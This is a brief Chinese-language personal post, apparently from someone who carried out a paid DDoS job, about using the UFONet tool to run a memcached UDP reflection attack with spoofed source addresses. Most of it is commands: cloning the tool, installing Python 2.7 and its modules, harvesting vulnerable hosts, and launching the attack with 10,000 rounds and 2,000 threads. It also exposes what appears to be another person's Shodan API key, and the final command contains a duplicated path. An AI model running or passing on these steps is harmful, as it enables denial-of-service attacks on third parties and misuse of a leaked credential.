这是一次差点蚀把米的过程啊,最后争议拿回了自己的手续费,白干了一场啊,真够倒霉的。
首先clone项目:
git clone https://github.com/epsylon/ufonet
原理很清楚,通过memcache的漏洞,memcache居然是UDP的,伪造源地址,发一堆请求到有漏洞的memchache,引起反射攻击。
一堆有漏洞的机器从哪获得呢?这个韩国人真的有Shodan API,手榴弹? 他的账号,确实可以看到一堆有毛病的机器
0ptoLUtmkSJ8DbAvyZ8PevTRsyLoxEuN
安装python:
wget https://www.python.org/ftp/python/2.7.14/Python-2.7.14.tgz
tar zxvf Python-2.7.14.tgz
cd Python-2.7.14
./configure --prefix=/export/servers/Python2714
make
make install
wget -O- "https://bootstrap.pypa.io/get-pip.py" | /export/servers/Python2714/bin/python
/export/servers/Python2714/bin/pip install pycurl
/export/servers/Python2714/bin/pip install geoip
/export/servers/Python2714/bin/pip install whois
/export/servers/Python2714/bin/pip install crypto
/export/servers/Python2714/bin/pip install request
先去拿一堆漏洞机器的列表
cd ufonet
/export/servers/Python2714/bin/python ./ufonet --sd 'botnet/dorks.txt' --sa
轰击:
/export/servers/Python2714/bin/python ./ufonet./ufonet -a http://target.com -r 10000 --threads 2000